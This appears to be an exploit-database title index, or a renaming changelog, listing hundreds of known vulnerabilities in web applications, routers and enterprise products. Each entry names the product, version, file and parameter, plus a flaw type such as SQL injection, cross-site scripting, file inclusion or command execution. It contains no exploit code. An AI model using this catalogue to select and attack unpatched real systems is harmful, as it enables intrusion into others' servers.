'index.php' Multiple SQL Injection microBlog 2.0 - 'index.php' Multiple SQL Injections NewsPHP - 'index.php' Multiple SQL Injection NewsPHP - 'index.php' Multiple SQL Injections ZixForum 1.12 - forum.asp Multiple SQL Injection ZixForum 1.12 - forum.asp Multiple SQL Injections HiveMail 1.2.2/1.3 - addressbook.update.php contactgroupid Variable Arbitrary PHP Command Execution HiveMail 1.2.2/1.3 - folders.update.php folderid Variable Arbitrary PHP Command Execution HiveMail 1.2.2/1.3 - 'addressbook.update.php' 'contactgroupid' Parameter Arbitrary PHP Command Execution HiveMail 1.2.2/1.3 - 'folders.update.php' 'folderid' Parameter Arbitrary PHP Command Execution ImageVue 0.16.1 - readfolder.php path Variable Arbitrary Directory Listing ImageVue 0.16.1 - 'readfolder.php' 'path' Parameter Arbitrary Directory Listing dotProject 2.0 - /modules/projects/gantt.php dPconfig[root_dir] Parameter Remote File Inclusion dotProject 2.0 - /includes/db_connect.php baseDir Remote File Inclusion dotProject 2.0 - /includes/session.php baseDir Parameter Remote File Inclusion dotProject 2.0 - /modules/projects/gantt2.php dPconfig[root_dir] Parameter Remote File Inclusion dotProject 2.0 - /modules/projects/vw_files.php dPconfig[root_dir] Parameter Remote File Inclusion dotProject 2.0 - /modules/admin/vw_usr_roles.php baseDir Parameter Remote File Inclusion dotProject 2.0 - /modules/public/calendar.php baseDir Parameter Remote File Inclusion dotProject 2.0 - /modules/public/date_format.php baseDir Parameter Remote File Inclusion dotProject 2.0 - /modules/tasks/gantt.php baseDir Parameter Remote File Inclusion dotProject 2.0 - '/modules/projects/gantt.php' 'dPconfig[root_dir]' Parameter Remote File Inclusion dotProject 2.0 - '/includes/db_connect.php' 'baseDir' Parameter Remote File Inclusion dotProject 2.0 - '/includes/session.php' 'baseDir' Parameter Remote File Inclusion dotProject 2.0 - '/modules/projects/gantt2.php' 'dPconfig[root_dir]' Parameter Remote File Inclusion dotProject 2.0 - '/modules/projects/vw_files.php' 'dPconfig[root_dir]' Parameter Remote File Inclusion dotProject 2.0 - '/modules/admin/vw_usr_roles.php' 'baseDir' Parameter Remote File Inclusion dotProject 2.0 - '/modules/public/calendar.php' 'baseDir' Parameter Remote File Inclusion dotProject 2.0 - '/modules/public/date_format.php' 'baseDir' Parameter Remote File Inclusion dotProject 2.0 - '/modules/tasks/gantt.php' 'baseDir' Parameter Remote File Inclusion MyBB 1.0.3 - private.php Multiple SQL Injection MyBB 1.0.3 - 'private.php' Multiple SQL Injections Ginkgo CMS - 'index.php rang Parameter' SQL Injection Ginkgo CMS - 'index.php' 'rang' Parameter SQL Injection Telmanik CMS Press 1.01b - 'pages.php page_name Parameter' SQL Injection Telmanik CMS Press 1.01b - 'pages.php' 'page_name' Parameter SQL Injection DCI-Taskeen 1.03 - basket.php Multiple Parameter SQL Injection DCI-Taskeen 1.03 - cat.php Multiple Parameter SQL Injection DCI-Taskeen 1.03 - 'basket.php' Multiple Parameter SQL Injections DCI-Taskeen 1.03 - 'cat.php' Multiple Parameter SQL Injections sBlog 0.7.2 - search.php keyword Variable POST Method Cross-Site Scripting sBlog 0.7.2 - comments_do.php Multiple Variable POST Method Cross-Site Scripting sBlog 0.7.2 - 'search.php' 'keyword' Parameter POST Method Cross-Site Scripting sBlog 0.7.2 - 'comments_do.php' Multiple Variable POST Method Cross-Site Scripting PHPFox 3.6.0 (build3) - Multiple SQL Injection PHPFox 3.6.0 (build3) - Multiple SQL Injections Verisign MPKI 6.0 - Haydn.exe Cross-Site Scripting Verisign MPKI 6.0 - 'Haydn.exe' Cross-Site Scripting DSLogin 1.0 - 'index.php' Multiple SQL Injection DSLogin 1.0 - 'index.php' Multiple SQL Injections MLMAuction Script - 'gallery.php id Parameter' SQL Injection MLMAuction Script - 'gallery.php' 'id' Parameter SQL Injection PHPMyForum 4.0 - 'index.php' type Variable CRLF Injection PHPMyForum 4.0 - 'index.php' 'type' Parameter CRLF Injection APT-webshop 3.0/4.0 - modules.php Multiple SQL Injection APT-webshop 3.0/4.0 - modules.php Multiple SQL Injections Cisco CallManager 3.x/4.x - Web Interface ccmadmin/phonelist.asp pattern Parameter Cross-Site Scripting Cisco CallManager 3.x/4.x - Web Interface ccmuser/logon.asp Cross-Site Scripting Cisco CallManager 3.x/4.x - Web Interface 'ccmadmin/phonelist.asp' Pattern Parameter Cross-Site Scripting Cisco CallManager 3.x/4.x - Web Interface 'ccmuser/logon.asp' Cross-Site Scripting 321soft PHP-Gallery 0.9 - 'index.php' path Variable Arbitrary Directory Listing 321soft PHP-Gallery 0.9 - 'index.php' 'path' Parameter Arbitrary Directory Listing Pacheckbook 1.1 - 'index.php' Multiple SQL Injection Pacheckbook 1.1 - 'index.php' Multiple SQL Injections Creative Software UK Community Portal 1.1 - PollResults.php Multiple Parameter SQL Injection Creative Software UK Community Portal 1.1 - 'PollResults.php' Multiple Parameter SQL Injections EvoTopsite 2.0 - 'index.php' Multiple SQL Injection timobraun Dynamic Galerie 1.0 - 'index.php' pfad Variable Arbitrary Directory Listing timobraun Dynamic Galerie 1.0 - galerie.php pfad Variable Arbitrary Directory Listing EvoTopsite 2.0 - 'index.php' Multiple SQL Injections timobraun Dynamic Galerie 1.0 - 'index.php' 'pfad' Parameter Arbitrary Directory Listing timobraun Dynamic Galerie 1.0 - 'galerie.php' 'pfad' Parameter Arbitrary Directory Listing Gphotos 1.4/1.5 - 'index.php' rep Variable Traversal Arbitrary Directory Listing Gphotos 1.4/1.5 - 'index.php' 'rep' Parameter Traversal Arbitrary Directory Listing Mini-NUKE 2.3 - Your_Account.asp Multiple SQL Injection Mini-NUKE 2.3 - 'Your_Account.asp' Multiple SQL Injections Woltlab Burning Board FLVideo Addon - 'video.php value Parameter' SQL Injection Woltlab Burning Board FLVideo Addon - 'video.php' 'value' Parameter SQL Injection glFusion 1.3.0 - 'search.php cat_id Parameter' SQL Injection glFusion 1.3.0 - 'search.php' 'cat_id' Parameter SQL Injection Geodesic Solutions Multiple Products - 'index.php' b Parameter SQL Injection Geodesic Solutions Multiple Products - 'index.php' 'b' Parameter SQL Injection RadScripts - a_editpage.php Filename Variable Arbitrary File Overwrite RadScripts - 'a_editpage.php' 'Filename' Parameter Arbitrary File Overwrite Banex PHP MySQL Banner Exchange 2.21 - admin.php Multiple Parameter SQL Injection Banex PHP MySQL Banner Exchange 2.21 - 'admin.php' Multiple Parameter SQL Injections XennoBB 2.1 - profile.php Multiple SQL Injection XennoBB 2.1 - 'profile.php' Multiple SQL Injections Vtiger CRM 5.4.0 - 'index.php onlyforuser Parameter' SQL Injection Vtiger CRM 5.4.0 - 'index.php' 'onlyforuser' Parameter SQL Injection CubeCart 3.0.x - /admin/print_order.php order_id Parameter Cross-Site Scripting CubeCart 3.0.x - '/admin/print_order.php' 'order_id' Parameter Cross-Site Scripting CubeCart 3.0.x - /admin/nav.php Multiple Parameter Cross-Site Scripting CubeCart 3.0.x - /admin/image.php image Parameter Cross-Site Scripting CubeCart 3.0.x - /admin/header.inc.php Multiple Parameter Cross-Site Scripting CubeCart 3.0.x - /footer.inc.php la_pow_by Parameter Cross-Site Scripting CubeCart 3.0.x - '/admin/nav.php' Multiple Parameter Cross-Site Scripting CubeCart 3.0.x - '/admin/image.php' 'image' Parameter Cross-Site Scripting CubeCart 3.0.x - '/admin/header.inc.php' Multiple Parameter Cross-Site Scripting CubeCart 3.0.x - '/footer.inc.php' 'la_pow_by' Parameter Cross-Site Scripting AckerTodo 4.2 - 'login.php' Multiple SQL Injection AckerTodo 4.2 - 'login.php' Multiple SQL Injections Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php sondage Parameter' SQL Injection Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php' 'sondage' Parameter SQL Injection INFINICART - browsesubcat.asp Multiple Parameter SQL Injection INFINICART - 'browsesubcat.asp' Multiple Parameter SQL Injection Car Site Manager - csm/asp/listings.asp Multiple Parameter SQL Injection Car Site Manager - 'csm/asp/listings.asp' Multiple Parameter SQL Injections Dragon Internet Events Listing 2.0.01 - admin_login.asp Multiple Field SQL Injection ASPIntranet 2.1 - Multiple SQL Injection Dragon Internet Events Listing 2.0.01 - 'admin_login.asp' Multiple Field SQL Injections ASPIntranet 2.1 - Multiple SQL Injections Image Gallery with Access Database - default.asp Multiple Parameter SQL Injection Image Gallery with Access Database - 'default.asp' Multiple Parameter SQL Injection 20/20 Applications Data Shed 1.0 - listings.asp Multiple Parameter SQL Injection 20/20 Applications Data Shed 1.0 - 'listings.asp' Multiple Parameter SQL Injections BestWebApp Dating Site Login Component - Multiple Field SQL Injection BestWebApp Dating Site Login Component - Multiple Field SQL Injections Enthrallweb eClassifieds - ad.asp Multiple Parameter SQL Injection Enthrallweb eClassifieds - 'ad.asp' Multiple Parameter SQL Injection BirdBlog 1.4 - /admin/admincore.php msg Parameter Cross-Site Scripting BirdBlog 1.4 - /admin/comments.php month Parameter Cross-Site Scripting BirdBlog 1.4 - /admin/entries.php month Parameter Cross-Site Scripting BirdBlog 1.4 - /admin/logs.php page Parameter Cross-Site Scripting BirdBlog 1.4 - '/admin/admincore.php' 'msg' Parameter Cross-Site Scripting BirdBlog 1.4 - '/admin/comments.php' 'month' Parameter Cross-Site Scripting BirdBlog 1.4 - '/admin/entries.php' 'month' Parameter Cross-Site Scripting BirdBlog 1.4 - '/admin/logs.php' 'page' Parameter Cross-Site Scripting Grandora Rialto 1.6 - /admin/default.asp Multiple Field SQL Injection Grandora Rialto 1.6 - '/admin/default.asp' Multiple Field SQL Injection Grandora Rialto 1.6 - searchkey.asp Multiple Parameter SQL Injection Grandora Rialto 1.6 - searchmain.asp Multiple Parameter SQL Injection Grandora Rialto 1.6 - searchoption.asp Multiple Parameter SQL Injection Grandora Rialto 1.6 - 'searchkey.asp' Multiple Parameter SQL Injection Grandora Rialto 1.6 - 'searchmain.asp' Multiple Parameter SQL Injection Grandora Rialto 1.6 - 'searchoption.asp' Multiple Parameter SQL Injection Enthrallweb eHomes - compareHomes.asp Multiple Parameter SQL Injection Enthrallweb eHomes - result.asp Multiple Parameter SQL Injection Enthrallweb eHomes - 'compareHomes.asp' Multiple Parameter SQL Injection Enthrallweb eHomes - 'result.asp' Multiple Parameter SQL Injection DUdownload 1.0/1.1 - detail.asp Multiple Parameter SQL Injection DUdownload 1.0/1.1 - 'detail.asp' Multiple Parameter SQL Injections Aspee Ziyaretci Defteri - giris.asp Multiple Field SQL Injection Aspee Ziyaretci Defteri - giris.asp Multiple Field SQL Injections ClickContact - default.asp Multiple SQL Injection ClickContact - 'default.asp' Multiple SQL Injections Dol Storye - Dettaglio.asp Multiple SQL Injection Dol Storye - 'Dettaglio.asp' Multiple SQL Injections Efkan Forum 1.0 - Grup Variable SQL Injection Efkan Forum 1.0 - 'Grup' Parameter SQL Injection EditTag 1.2 - edittag.cgi file Variable Arbitrary File Disclosure EditTag 1.2 - edittag.pl file Variable Arbitrary File Disclosure EditTag 1.2 - edittag_mp.cgi file Variable Arbitrary File Disclosure EditTag 1.2 - edittag_mp.pl file Variable Arbitrary File Disclosure EditTag 1.2 - 'edittag.cgi' 'file' Parameter Arbitrary File Disclosure EditTag 1.2 - 'edittag.pl' 'file' Parameter Arbitrary File Disclosure EditTag 1.2 - 'edittag_mp.cgi' 'file' Parameter Arbitrary File Disclosure EditTag 1.2 - 'edittag_mp.pl' 'file' Parameter Arbitrary File Disclosure Indexu 5.0/5.3 - mailing_list.php Multiple Variables Cross-Site Scripting Indexu 5.0/5.3 - 'mailing_list.php' Multiple Parameters Cross-Site Scripting Project'Or RIA 3.4.0 - 'objectDetail.php objectId Parameter' SQL Injection Project'Or RIA 3.4.0 - 'objectDetail.php' 'objectId' Parameter SQL Injection WordPress 2.1.1 - 'wp-includes/theme.php' iz Variable Arbitrary Command Execution Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php' 's' Variable SQL Injection WordPress 2.1.1 - 'wp-includes/theme.php' 'iz' Parameter Arbitrary Command Execution Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php' 's' Parameter SQL Injection aBitWhizzy - whizzylink.php d Variable Traversal Arbitrary Directory Listing aBitWhizzy - 'whizzylink.php' 'd' Parameter Traversal Arbitrary Directory Listing MyBloggie 2.1.x - 'index.php' Multiple SQL Injection MyBloggie 2.1.x - 'index.php' Multiple SQL Injections PHPLive! 3.2.2 - super/info.php BASE_URL Variable Parameter Cross-Site Scripting PHPLive! 3.2.2 - 'super/info.php' 'BASE_URL' Parameter Parameter Cross-Site Scripting JFFNms 0.8.3 - auth.php Multiple Parameter SQL Injection JFFNms 0.8.3 - 'auth.php' Multiple Parameter SQL Injection DotClear 1.2.x - /ecrire/trackback.php post_id Parameter Cross-Site Scripting DotClear 1.2.x - /tools/thememng/index.php tool_url Parameter Cross-Site Scripting DotClear 1.2.x - '/ecrire/trackback.php' 'post_id' Parameter Cross-Site Scripting DotClear 1.2.x - '/tools/thememng/index.php' 'tool_url' Parameter Cross-Site Scripting PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass / Multiple SQL Injection PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass / Multiple SQL Injections Exponent CMS 0.96.5/0.96.6 - iconspopup.php icodir Variable Traversal Arbitrary Directory Listing Exponent CMS 0.96.5/0.96.6 - 'iconspopup.php' 'icodir' Parameter Traversal Arbitrary Directory Listing Phorum 5.1.20 - admin.php module[] Variable Full Path Disclosure Phorum 5.1.20 - 'admin.php' 'module[]' Parameter Full Path Disclosure Chamilo Lms 1.9.6 - 'profile.php password0 Parameter' SQL Injection Dokeos 2.2 RC2 - 'index.php language Parameter' SQL Injection Chamilo Lms 1.9.6 - 'profile.php' 'password0 Parameter SQL Injection Dokeos 2.2 RC2 - 'index.php' 'language' Parameter SQL Injection UebiMiau 2.7.10 - 'demo/pop3/error.php' Multiple Variable Full Path Disclosure UebiMiau 2.7.10 - 'demo/pop3/error.php' Multiple Parameters Full Path Disclosure PHPAccounts 0.5 - 'index.php' Multiple SQL Injection PHPAccounts 0.5 - 'index.php' Multiple SQL Injections NetFlow Analyzer 5 - /jspui/applicationList.jsp alpha Parameter Cross-Site Scripting NetFlow Analyzer 5 - /jspui/appConfig.jsp task Parameter Cross-Site Scripting NetFlow Analyzer 5 - '/jspui/applicationList.jsp' 'alpha' Parameter Cross-Site Scripting NetFlow Analyzer 5 - '/jspui/appConfig.jsp' 'task' Parameter Cross-Site Scripting NetFlow Analyzer 5 - /jspui/selectDevice.jsp rtype Parameter Cross-Site Scripting NetFlow Analyzer 5 - /jspui/customReport.jsp rtype Parameter Cross-Site Scripting NetFlow Analyzer 5 - '/jspui/selectDevice.jsp' 'rtype' Parameter Cross-Site Scripting NetFlow Analyzer 5 - '/jspui/customReport.jsp' 'rtype' Parameter Cross-Site Scripting geoBlog MOD_1.0 - deletecomment.php id Variable Arbitrary Comment Deletion geoBlog MOD_1.0 - deleteblog.php id Variable Arbitrary Blog Deletion geoBlog MOD_1.0 - 'deletecomment.php' 'id' Parameter Arbitrary Comment Deletion geoBlog MOD_1.0 - 'deleteblog.php' 'id' Parameter Arbitrary Blog Deletion Next Gen Portfolio Manager - default.asp Multiple SQL Injection Next Gen Portfolio Manager - 'default.asp' Multiple SQL Injections ACG News 1.0 - 'index.php' Multiple SQL Injection Cisco CallManager 4.2 - / CUCM 4.2 Logon Page lang Parameter SQL Injection ACG News 1.0 - 'index.php' Multiple SQL Injections Cisco CallManager 4.2 / CUCM 4.2 - Logon Page 'lang' Parameter SQL Injection WebBatch - webbatch.exe URL Cross-Site Scripting WebBatch - webbatch.exe dumpinputdata Variable Remote Information Disclosure WebBatch - 'webbatch.exe' URL Cross-Site Scripting WebBatch - 'webbatch.exe' 'dumpinputdata' Parameter Remote Information Disclosure NetWin DNews - Dnewsweb.exe Multiple Cross-Site Scripting Vulnerabilities NetWin DNews - 'Dnewsweb.exe' Multiple Cross-Site Scripting Vulnerabilities Scott Manktelow Design Stride 1.0 - Courses detail.php Multiple SQL Injection Scott Manktelow Design Stride 1.0 Courses - 'detail.php' Multiple SQL Injections Article Dashboard - 'admin/login.php' Multiple SQL Injection Article Dashboard - 'admin/login.php' Multiple SQL Injections Multi-Forums - Directory.php Multiple SQL Injection Multi-Forums - 'Directory.php' Multiple SQL Injections JiRo's Banner System 2.0 - 'login.asp' Multiple SQL Injection JiRo's Banner System 2.0 - 'login.asp' Multiple SQL Injections Absolute News Manager .NET 5.1 - 'pages/default.aspx' template Variable Remote File Access Absolute News Manager .NET 5.1 - 'xlaabsolutenm.aspx' Multiple Parameter SQL Injection Absolute News Manager .NET 5.1 - 'pages/default.aspx' 'template' Parameter Remote File Access Absolute News Manager .NET 5.1 - 'xlaabsolutenm.aspx' Multiple Parameter SQL Injections phpRPG 0.8 - /tmp Directory PHPSESSID Cookie Session Hijacking phpRPG 0.8 - '/tmp' Directory PHPSESSID Cookie Session Hijacking Web Sihirbazi 5.1.1 - 'default.asp' Multiple SQL Injection Web Sihirbazi 5.1.1 - 'default.asp' Multiple SQL Injections eTicket 1.5.5.2 - search.php Multiple Parameter SQL Injection eTicket 1.5.5.2 - admin.php Multiple Parameter SQL Injection eTicket 1.5.5.2 - 'search.php' Multiple Parameter SQL Injection eTicket 1.5.5.2 - 'admin.php' Multiple Parameter SQL Injection Sun Java System Identity Manager 6.0/7.0/7.1 - /idm/login.jsp Multiple Parameter Cross-Site Scripting Sun Java System Identity Manager 6.0/7.0/7.1 - /idm/account/findForSelect.jsp resultsForm Parameter Cross-Site Scripting Sun Java System Identity Manager 6.0/7.0/7.1 - /idm/help/index.jsp helpUrl Variable Remote Frame Injection Sun Java System Identity Manager 6.0/7.0/7.1 - /idm/user/main.jsp activeControl Parameter Cross-Site Scripting Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/login.jsp' Multiple Parameter Cross-Site Scripting Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/account/findForSelect.jsp' 'resultsForm' Parameter Cross-Site Scripting Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/help/index.jsp' 'helpUrl' Parameter Remote Frame Injection Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/user/main.jsp' 'activeControl' Parameter Cross-Site Scripting MyBB 1.2.10 - 'moderation.php' Multiple SQL Injection MyBB 1.2.10 - 'moderation.php' Multiple SQL Injections PacerCMS 0.6 - 'id' Parameter Multiple SQL Injection PacerCMS 0.6 - 'id' Parameter Multiple SQL Injections Ipswitch WS_FTP Server 6 - /WSFTPSVR/FTPLogServer/LogViewer.asp Authentication Bypass Ipswitch WS_FTP Server 6 - '/WSFTPSVR/FTPLogServer/LogViewer.asp' Authentication Bypass Cacti 0.8.7 - tree.php Multiple Parameter SQL Injection Cacti 0.8.7 - 'tree.php' Multiple Parameter SQL Injections Site2Nite Real Estate Web - 'agentlist.asp' Multiple SQL Injection Site2Nite Real Estate Web - 'agentlist.asp' Multiple SQL Injections WebcamXP 3.72.440/4.05.280 Beta - /pocketpc camnum Variable Arbitrary Memory Disclosure WebcamXP 3.72.440/4.05.280 Beta - /show_gallery_pic id Variable Arbitrary Memory Disclosure WebcamXP 3.72.440/4.05.280 Beta - '/pocketpc' 'camnum' Parameter Arbitrary Memory Disclosure WebcamXP 3.72.440/4.05.280 Beta - '/show_gallery_pic' 'id' Parameter Arbitrary Memory Disclosure Elastic Path 4.1 - 'manager/FileManager.jsp' dir Variable Traversal Arbitrary Directory Listing Elastic Path 4.1 - 'manager/FileManager.jsp' 'dir' Parameter Traversal Arbitrary Directory Listing osCommerce 2.3.3.4 - 'geo_zones.php zID Parameter' SQL Injection osCommerce 2.3.3.4 - 'geo_zones.php' 'zID' Parameter SQL Injection D-Link DSL-2750B (ADSL Router) - Cross-Site Request Forgery D-Link DSL-2750B ADSL Route) - Cross-Site Request Forgery Netgear DGN2200 N300 Wireless Router - Multiple Vulnerabilities NETGEAR DGN2200 N300 Wireless Router - Multiple Vulnerabilities Concrete5 5.6.2.1 - 'index.php cID Parameter' SQL Injection Concrete5 5.6.2.1 - 'index.php' 'cID' Parameter SQL Injection TLM CMS 1.1 - 'index.php' Multiple SQL Injection TLM CMS 1.1 - 'index.php' Multiple SQL Injections RunCMS 1.6.1 - 'pm.class.php' Multiple SQL Injection RunCMS 1.6.1 - 'pm.class.php' Multiple SQL Injections IBD Micro CMS 3.5 - 'microcms-admin-login.php' Multiple SQL Injection IBD Micro CMS 3.5 - 'microcms-admin-login.php' Multiple SQL Injections WordPress Plugin AdRotate 3.9.4 - 'clicktracker.php track Parameter' SQL Injection WordPress Plugin AdRotate 3.9.4 - 'clicktracker.php' 'track' Parameter SQL Injection JustPORTAL 1.0 - 'site' Parameter Multiple SQL Injection Proje ASP Portal 2.0 - 'id' Parameter Multiple SQL Injection dvbbs 8.2 - 'login.asp' Multiple SQL Injection JustPORTAL 1.0 - 'site' Parameter Multiple SQL Injections Proje ASP Portal 2.0 - 'id' Parameter Multiple SQL Injections dvbbs 8.2 - 'login.asp' Multiple SQL Injections Te Ecard - 'id' Parameter Multiple SQL Injection Te Ecard - 'id' Parameter Multiple SQL Injections Benja CMS 0.1 - /admin/admin_edit_submenu.php URL Cross-Site Scripting Benja CMS 0.1 - '/admin/admin_edit_submenu.php' URL Cross-Site Scripting Benja CMS 0.1 - /admin/admin_edit_topmenu.php URL Cross-Site Scripting Benja CMS 0.1 - '/admin/admin_edit_topmenu.php' URL Cross-Site Scripting PHP Ticket System Beta 1 - 'get_all_created_by_user.php id Parameter' SQL Injection PHP Ticket System Beta 1 - 'get_all_created_by_user.php' 'id' Parameter SQL Injection webERP 4.11.3 - 'SalesInquiry.php SortBy Parameter' SQL Injection webERP 4.11.3 - 'SalesInquiry.php' 'SortBy' Parameter SQL Injection couponPHP CMS 1.0 - Multiple Persistent Cross-Site Scripting / SQL Injection couponPHP CMS 1.0 - Multiple Persistent Cross-Site Scripting / SQL Injections Claroline 1.8.9 - claroline/redirector.php url Variable Arbitrary Site Redirect Claroline 1.8.9 - 'claroline/redirector.php' 'url' Parameter Arbitrary Site Redirect EasyPublish 3.0 - 'read' Parameter Multiple SQL Injection / Cross-Site Scripting EasyPublish 3.0 - 'read' Parameter Multiple SQL Injections / Cross-Site Scripting ownCloud 4.0.x/4.5.x - 'upload.php Filename Parameter' Remote Code Execution ownCloud 4.0.x/4.5.x - 'upload.php' 'Filename' Parameter Remote Code Execution Battle.net Clan Script 1.5.x - 'index.php' Multiple SQL Injection Battle.net Clan Script 1.5.x - 'index.php' Multiple SQL Injections ZYXEL Router P-660HN-T1A - Login Bypass ZYXEL P-660HN-T1A Router - Login Bypass PromoProducts - 'view_product.php' Multiple SQL Injection PromoProducts - 'view_product.php' Multiple SQL Injections EasyRealtorPRO 2008 - 'site_search.php' Multiple SQL Injection EasyRealtorPRO 2008 - 'site_search.php' Multiple SQL Injections OpenCart 1.5.6.1 - 'openbay' Multiple SQL Injection OpenCart 1.5.6.1 - 'openbay' Multiple SQL Injections InterWorx Control Panel 5.0.13 build 574 - 'xhr.php i Parameter' SQL Injection InterWorx Control Panel 5.0.13 build 574 - 'xhr.php' 'i' Parameter SQL Injection Tandis CMS 2.5 - 'index.php' Multiple SQL Injection Tandis CMS 2.5 - 'index.php' Multiple SQL Injections TWiki 4.x - SEARCH Variable Remote Command Execution TWiki 4.x - URLPARAM Variable Cross-Site Scripting TWiki 4.x - 'SEARCH' Parameter Remote Command Execution TWiki 4.x - 'URLPARAM' Parameter Cross-Site Scripting DO-CMS 3.0 - 'p' Parameter Multiple SQL Injection DO-CMS 3.0 - 'p' Parameter Multiple SQL Injections MKPortal 1.2.1 - /modules/blog/index.php Home Template Textarea SQL Injection MKPortal 1.2.1 - /modules/rss/handler_image.php i Parameter Cross-Site Scripting MKPortal 1.2.1 - '/modules/blog/index.php' Home Template Textarea SQL Injection MKPortal 1.2.1 - '/modules/rss/handler_image.php' 'i' Parameter Cross-Site Scripting Banking@Home 2.1 - 'login.asp' Multiple SQL Injection Banking@Home 2.1 - 'login.asp' Multiple SQL Injections kitForm CRM Extension 0.43 - 'sorter.php sorter_value Parameter' SQL Injection kitForm CRM Extension 0.43 - 'sorter.ph' 'sorter_value' Parameter SQL Injection dompdf 0.6.0 - 'dompdf.php read Parameter' Arbitrary File Read dompdf 0.6.0 - 'dompdf.php' 'read' Parameter Arbitrary File Read Multiple JiRo's Products - 'files/login.asp' Multiple SQL Injection Multiple JiRo's Products - 'files/login.asp' Multiple SQL Injections VisualShapers EZContents 2.0.3 - Authentication Bypass / Multiple SQL Injection VisualShapers EZContents 2.0.3 - Authentication Bypass / Multiple SQL Injections Pars CMS - 'RP' Parameter Multiple SQL Injection Pars CMS - 'RP' Parameter Multiple SQL Injections tenfourzero.net Shutter 0.1.4 - 'admin.html' Multiple SQL Injection tenfourzero.net Shutter 0.1.4 - 'admin.html' Multiple SQL Injections MODx 1.0.3 - 'index.php' Multiple SQL Injection MODx 1.0.3 - 'index.php' Multiple SQL Injections HuronCMS - 'index.php' Multiple SQL Injection HuronCMS - 'index.php' Multiple SQL Injections 4x CMS - 'login.php' Multiple SQL Injection 4x CMS - 'login.php' Multiple SQL Injections Affiliate Store Builder - 'edit_cms.php' Multiple SQL Injection Affiliate Store Builder - 'edit_cms.php' Multiple SQL Injections ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injection ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injections GREEZLE - Global Real Estate Agent Login Multiple SQL Injection (GREEZLE) Global Real Estate Agent Login - Multiple SQL Injections SaffaTunes CMS - 'news.php' Multiple SQL Injection SaffaTunes CMS - 'news.php' Multiple SQL Injections pragmaMX 0.1.11 - 'modules.php' Multiple SQL Injection pragmaMX 0.1.11 - 'modules.php' Multiple SQL Injections DiamondList - /user/main/update_settings setting[site_title] Parameter Cross-Site Scripting DiamondList - /user/main/update_category category[description] Parameter Cross-Site Scripting DiamondList - '/user/main/update_settings' 'setting[site_title]' Parameter Cross-Site Scripting DiamondList - '/user/main/update_category' 'category[description]' Parameter Cross-Site Scripting vBulletin 4.0.x < 4.1.2 - 'search.php cat Parameter' SQL Injection vBulletin 4.0.x < 4.1.2 - 'search.php' 'cat' Parameter SQL Injection Mulitple WordPress Themes - 'admin-ajax.php img Parameter' Arbitrary File Download Mulitple WordPress Themes - 'admin-ajax.php' 'img' Parameter Arbitrary File Download tourismscripts HotelBook - 'hotel_id' Parameter Multiple SQL Injection tourismscripts HotelBook - 'hotel_id' Parameter Multiple SQL Injections APBook 1.3 - Admin Login Multiple SQL Injection APBook 1.3 - Admin Login Multiple SQL Injections MODx manager - /controllers/default/resource/tvs.php class_key Parameter Traversal Local File Inclusion MODx manager - '/controllers/default/resource/tvs.php' 'class_key' Parameter Traversal Local File Inclusion Bacula-Web 5.2.10 - 'joblogs.php jobid Parameter' SQL Injection Bacula-Web 5.2.10 - 'joblogs.php' 'jobid Parameter SQL Injection PHP Scripts Now Riddles - /riddles/results.php searchQuery Parameter Cross-Site Scripting PHP Scripts Now Riddles - /riddles/list.php catid Parameter SQL Injection PHP Scripts Now Riddles - '/riddles/results.php' 'searchQuery' Parameter Cross-Site Scripting PHP Scripts Now Riddles - '/riddles/list.php' 'catid' Parameter SQL Injection Easy Banner 2009.05.18 - member.php Multiple Parameter SQL Injection Authentication Bypass Easy Banner 2009.05.18 - 'member.php' Multiple Parameter SQL Injection / Authentication Bypass E-lokaler CMS 2 - Admin Login Multiple SQL Injection E-lokaler CMS 2 - Admin Login Multiple SQL Injections Blog:CMS 4.2.1 e - Multiple HTML Injection / Cross-Site Scripting Blog:CMS 4.2.1 e - Multiple HTML Injections / Cross-Site Scripting Piwigo 2.6.0 - 'picture.php rate Parameter' SQL Injection Piwigo 2.6.0 - 'picture.php' 'rate' Parameter SQL Injection Eleanor CMS - Cross-Site Scripting / Multiple SQL Injection Eleanor CMS - Cross-Site Scripting / Multiple SQL Injections Netgear WNR500 Wireless Router - Parameter Traversal Arbitrary File Access Exploit NETGEAR WNR500 Wireless Router - Parameter Traversal Arbitrary File Access Exploit PHPMyRecipes 1.2.2 - 'dosearch.php words_exact Parameter' SQL Injection PHPMyRecipes 1.2.2 - 'dosearch.php' 'words_exact Parameter SQL Injection Cosmoshop 10.05.00 - Multiple Cross-Site Scripting / SQL Injection Cosmoshop 10.05.00 - Multiple Cross-Site Scripting / SQL Injections BoutikOne - search.php Multiple Parameter SQL Injection BoutikOne - 'search.php' Multiple Parameter SQL Injections Ripe Website Manager 1.1 - Cross-Site Scripting / Multiple SQL Injection Ripe Website Manager 1.1 - Cross-Site Scripting / Multiple SQL Injections Cisco Unified Communications Manager 8.5 - 'xmldirectorylist.jsp' Multiple SQL Injection Cisco Unified Communications Manager 8.5 - 'xmldirectorylist.jsp' Multiple SQL Injections Cetera eCommerce - Multiple Cross-Site Scripting / SQL Injection Cetera eCommerce - Multiple Cross-Site Scripting / SQL Injections GuppY 4.6.14 - 'lng' Parameter Multiple SQL Injection GuppY 4.6.14 - 'lng' Parameter Multiple SQL Injections Soitec SmartEnergy 1.4 - SCADA Login SQL Injection Authentication Bypass Soitec SmartEnergy 1.4 - SCADA Login SQL Injection / Authentication Bypass CIK Telecom VoIP router SVG6000RW - Privilege Escalation / Command Execution CIK Telecom VoIP Router SVG6000RW - Privilege Escalation / Command Execution PHPMyRecipes 1.2.2 - 'browse.php category Parameter' SQL Injection PHPMyRecipes 1.2.2 - 'browse.php' 'category' Parameter SQL Injection 4Images 1.7.9 - Multiple Remote File Inclusions / SQL Injection 4Images 1.7.9 - Multiple Remote File Inclusions / SQL Injections TCExam 11.1.29 - 'tce_xml_user_results.php' Multiple SQL Injection TCExam 11.1.29 - 'tce_xml_user_results.php' Multiple SQL Injections Calendarix 0.8.20080808 - Multiple Cross-Site Scripting / SQL Injection 